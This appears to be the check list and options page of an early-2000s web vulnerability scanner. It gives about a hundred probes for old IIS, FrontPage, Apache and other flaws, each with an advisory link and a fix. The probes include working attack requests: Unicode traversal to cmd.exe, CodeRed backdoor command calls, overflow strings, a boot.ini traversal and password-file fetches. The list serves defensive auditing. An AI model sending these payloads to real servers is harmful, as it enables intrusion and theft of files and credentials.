Use default Scans Use SSL (https), works on ANY port Show FIX with results Force scan ALL vulns reguardless of server version returned Show last-modified date when matches are found Verbose output Debug Level:
Host List Syntax:
a.b.c.d/n - 10.0.0.1/25
a.b.c.* - 10.0.0.* (0-255) same as /24
a.b.c.d/w.x.y.z - 10.0.0.0/255.255.224.0 (standard format)
a.b.c.d/w.x.y.z - 10.0.0.0/0.0.16.255 (cisco format)
a.b.c.d-z - 10.1.2.0-12
a.b.c-x.* - 10.0.0-3.* (last octet has to be * or 0)
a.b.c-x.d - 10.0.0-3.0
hostname - www.unspecific.com
/30 255.255.255.252 4 IPs
/29 255.255.255.248 8 IPs
/28 255.255.255.240 16 IPS
/27 255.255.255.224 32 IPs
/26 255.255.255.192 64 IPs
/25 255.255.255.128 128 IPs
/24 255.255.255.0 256 IPs
/23 255.255.254.0 512 IPs
/22 255.255.252.0 1024 IPs
/21 255.255.248.0 2048 IPs
/20 255.255.240.0 4096 IPs
/19 255.255.224.0 8192 IPs
/18 255.255.192.0 16384 IPs
/17 255.255.128.0 32768 IPs
/16 255.255.0.0 65536 IPs
Defaul scans include:
.printer Info Leakage
RAW GET /qwertypoiu.printer HTTP/1.0
Microsoft-IIS
UNKNOWN Severity
Remove mapping for .printer
/_vti_bin/shtml.dll file access
GET _vti_bin/shtml.dll
Microsoft-IIS
UNKNOWN Severity
Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin
/_vti_bin/shtml.dll path disclosure
GET /_vti_bin/shtml.dll/asdfghjkl
Microsoft-IIS
UNKNOWN Severity
http://online.securityfocus.com/bid/1174/discussion/
Remove FrontPage or File
/_vti_bin/shtml.exe path disclosure
GET /_vti_bin/shtml.exe/qwertyuiop
Microsoft-IIS
UNKNOWN Severity
http://online.securityfocus.com/bid/1174/discussion/
Remove FrontPage or File
A1Stats a1disp.cgi
GET /cgi-bin/a1stats/a1disp.cgi
Multiple Versions Affected
UNKNOWN Severity
http://online.securityfocus.com/archive/1/183028/2001-05-05/2001-05-11/0
CSS 404 Hole
RAW GET /ajfhasdfgsagfakjhgd HTTP/1.0
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS02-018.asp
Install Rollup Patch from MS02-018
CodeRed / IDA / idq.dll
GET x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS01-033.asp
PATCH with MS01-003
ColdFusion Admin startstop.html
GET CFIDE/Administrator/startstop.html
Multiple Versions Affected
UNKNOWN Severity
Delete the startstop.html
FrontPage extention dvwssr.dll
GET _vti_bin/_vti_aut/dvwssr.dll
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1
Uninstall FP or delete the file
FrontPage extention htimage.exe
GET cgi-bin/htimage.exe?2,2
Microsoft-IIS
UNKNOWN Severity
FrontPage extention imagemap.exe
GET cgi-bin/imagemap.exe?2,2
Microsoft-IIS
UNKNOWN Severity
FrontPage extention shtml.exe
GET _vti_pvt/shtml.exe
Microsoft-IIS
UNKNOWN Severity
HTTP DELETE allowed
DELETE HACKED.txt
Multiple Versions Affected
UNKNOWN Severity
http://www.w3c.org/Protocols/rfc2616/rfc2616-sec9.html
Disable off DELETE in the options of the web server
HTTP PUT allowed
PUT HACKED.txt
Multiple Versions Affected
UNKNOWN Severity
http://www.w3c.org/Protocols/rfc2616/rfc2616-sec9.html
Disable PUT for all directories in the web server
IIS Index Server null.htw
GET null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
Patch It
IIS ViewCode SiteServer Inspired
GET Sites/Knowledge/Membership/Inspired/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the file Sites/Knowledge/Membership/Inspired/ViewCode.asp
IIS ViewCode SiteServer Inspiredtutorial
GET Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Publishing
GET SiteServer/Publishing/viewcode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Push
GET Sites/Samples/Knowledge/Push/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Samples Inspired
GET Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Samples Inspiredtutorial
GET Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS ViewCode SiteServer Search
GET Sites/Samples/Knowledge/Search/ViewCode.asp
Microsoft-IIS
UNKNOWN Severity
Delete the files
IIS acdg.htr mapping _AuthChangeUrl?
GET _AuthChangeUrl?
Microsoft-IIS
UNKNOWN Severity
http://support.microsoft.com/support/kb/articles/Q282/0/62.ASP
Remove IISADMPWD from the IIS Admin MMC
IIS coutner d.o.s. fpcount.exe
GET scripts/fpcount.exe
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/bid/2252
IIS password brute iisadmpwd/achg.htr
GET iisadmpwd/achg.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp.htr
GET iisadmpwd/aexp.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp2.htr
GET iisadmpwd/aexp2.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp2b.htr
GET iisadmpwd/aexp2b.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp3.htr
GET iisadmpwd/aexp3.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp4.htr
GET iisadmpwd/aexp4.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/aexp4b.htr
GET iisadmpwd/aexp4b.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/anot.htr
GET iisadmpwd/anot.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS password brute iisadmpwd/anot3.htr
GET iisadmpwd/anot3.htr
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/archive.pl?id=1&mid=8515
Remove IISADMPWD from the IIS Admin MMC
IIS remote file creation scripts/tools/getdrvs.exe
GET scripts/tools/getdrvs.exe
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/bid/1818
IIS remote file creation scripts/tools/newdsn.exe
GET scripts/tools/newdsn.exe
Microsoft-IIS
UNKNOWN Severity
http://www.securityfocus.com/bid/1818
Remove newdsn.exe from the tools directory
IIS remote file creation tools/newdsn.exe
GET tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREATE_DB&attr=
Microsoft-IIS/3
UNKNOWN Severity
http://www.securityfocus.com/bid/1818
Remove newdsn.exe from the tools directory
IISSamples / Code.asp
GET iissamples/exair/howitworks/Code.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / Codebrw1.asp
GET iissamples/exair/howitworks/Codebrw1.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / Codebrws.asp
GET iissamples/exair/howitworks/Codebrws.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / sdk / CodeBrws.asp
GET iissamples/sdk/asp/docs/CodeBrws.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / sdk / codebrw2.asp
GET iissamples/sdk/asp/docs/codebrw2.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
IISSamples / sdk / codebrws.asp
GET iissamples/sdk/asp/docs/codebrws.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove IISSAMPLES from IIS Admin MMC
Infected CodeRed & VLUN /msadc/root.exe
GET msdac/root.exe?/c+dir
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
REBUILD THE BOX
Infected CodeRed & VLUN /scripts/root.exe
GET scripts/root.exe?/c+dir
Microsoft-IIS
UNKNOWN Severity
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
REBUILD THE BOX
Infected with Nimda /readme.eml
GET /
Microsoft-IIS
UNKNOWN Severity
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
REBUILD THE BOX
JRUN WEB-INF Access
GET WEB-INF/web.xml
JRun
UNKNOWN Severity
http://www.foundstone.com/knowledge/randd-advisories-display.html?id=231
Lotus notes domcfg.nsf
GET domcfg.nsf/?open
Lotus
UNKNOWN Severity
MSADC / showcode.asp
GET msadc/Samples/selector/showcode.asp
Microsoft-IIS
UNKNOWN Severity
http://www.atstake.com/research/advisories/1999/showcode.txt
Remove MSADC from IIS Admin MMC
MSFP passwd file administrator.pwd
GET _vti_pvt/administrator.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file administrators.pwd
GET _vti_pvt/administrators.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file authors.pwd
GET _vti_pvt/authors.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file service.pwd
GET _vti_pvt/service.pwd
Microsoft-IIS
UNKNOWN Severity
MSFP passwd file users.pwd
GET _vti_pvt/users.pwd
Microsoft-IIS
UNKNOWN Severity
Netscape DOS
GET publisher
Netscape
UNKNOWN Severity
http://www.kb.cert.org/vuls/id/191763
Open Proxy
Proxy http://www.unspecific.com/proxy.test
Multiple Versions Affected
UNKNOWN Severity
Turn off Proxy or restrict to specific addresses
PHP File Upload Overflow ver <= 4.2.0
GET /
PHP
UNKNOWN Severity
Remote cmd exec (via SQL) ASPSamp
GET ASPSamp/AdvWorks/equipment/catalog_type.asp
Microsoft-IIS
UNKNOWN Severity
Delete ASPSamp sample directory
Remote cmd exec (via SQL) AdvWorks sample files
GET AdvWorks/equipment/catalog_type.asp
Microsoft-IIS
UNKNOWN Severity
Delete the AdvWorks sample directory
Running PHP-Nuke
GET index.php
Multiple Versions Affected
UNKNOWN Severity
http://www.securityfocus.com/cgi-bin/vulns.pl?section=keyword&keyword=PHP
Running vulnerable Apache
GET /
Apache
UNKNOWN Severity
Running vulnerable thttpd
GET /
thttpd
UNKNOWN Severity
SMTP Admin
GET Mail/smtp/Admin/smadv.asp
Microsoft-IIS
UNKNOWN Severity
Remove mapping for Mail/SMTP/Admin
SQL Samples /clocktower
GET clocktower
Microsoft-IIS
UNKNOWN Severity
SQL Samples /market
GET market
Microsoft-IIS
UNKNOWN Severity
SQL Samples /mspress30
GET mspress30
Microsoft-IIS
UNKNOWN Severity
SQL Samples /vc30
GET vc30
Microsoft-IIS
UNKNOWN Severity
Site Server DSN w/LDAP anon user
GET SiteServer/Admin/commerce/foundation/DSN.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server GroupManager w/LDAP anon user
GET Admin/knowledge/dsmgr/users/GroupManager.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server Publishing Users w/LDAP anon user
PUT Sites/Publishing/Users/
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server UserManager w/LDAP anon user
GET Admin/knowledge/dsmgr/users/UserManager.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server View Source
GET siteserver/publishing/viewcode.asp
Microsoft-IIS
UNKNOWN Severity
Site Server autoconfig w/LDAP anon user
GET _mem_bin/autoconfig.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server driver w/LDAP anon user
GET SiteServer/Admin/commerce/foundation/driver.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server dsmgr w/LDAP anon user
GET SiteServer/Admin/knowledge/dsmgr/default.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server findserver w/LDAP anon user
GET SiteServer/admin/findvserver.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
Site Server formslogin w/LDAP anon user
GET _mem_bin/formslogin.asp
Microsoft-IIS
UNKNOWN Severity
http://www.wiretrip.net/rfp/p/doc.asp/i5/d69.htm
Remove Pages
SiteServer Admin
GET SiteServer/Admin
Microsoft-IIS
UNKNOWN Severity
SiteServer Publishing
PUT Sites/Publishing/Users/
Microsoft-IIS
UNKNOWN Severity
UniCode Exploit from / %255c
GET ..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /_mem_bin %255c
GET _mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH - MS00-078
UniCode Exploit from /_vti_bin %255c
GET _vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /cfide %255c
GET cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH - MS00-078
UniCode Exploit from /msadc %255c
GET msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /scripts %255c
GET scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /scripts %c0%af..%c0%af
GET scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
UniCode Exploit from /scripts %c0%af../
GET scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
Microsoft-IIS
HIGH
http://www.microsoft.com/technet/security/bulletin/MS00-078.asp
PATCH
_vti_bin/fpcount.exe Buffer Overflow
GET _vti_bin/fpcount.exe?Page=default.asp|Image=3
Microsoft-IIS
UNKNOWN Severity
Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin
fp30reg.dll Buffer Overflow
RAW GET /_vti_bin/_vti_aut/fp30reg.dll?1234=X HTTP/1.0
Microsoft-IIS
UNKNOWN Severity
Uninstall MSFP, delete /_vti_bin/shtml.dll and/or remove virtual mapping for _vti_bin
fp30reg.dll CSS
GET /_vti_bin/_vti_aut/fp30reg.dll
Microsoft-IIS
UNKNOWN Severity
iPlanet and Netscape file viewing
GET search?NS-query-pat=..\..\..\..\..\boot.ini
Multiple Versions Affected
UNKNOWN Severity
Turn off the search engine (it is off by default on 6.0) until a fix is provided.
mod_blowchunks vulnerability
RAW GET /checkapache.html HTTP/1.0
Transfer-Encoding: chunked
999999999;
a
0
Multiple Versions Affected
UNKNOWN Severity
Update Apache
msadc.dll vuln
POST msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName
Microsoft-IIS
UNKNOWN Severity
Remove MSADC from IIS Admin MMC
webhits.dll arbitrary file access
GET qwertypoiu.htw
Microsoft-IIS
UNKNOWN Severity
Remove mapping for .htw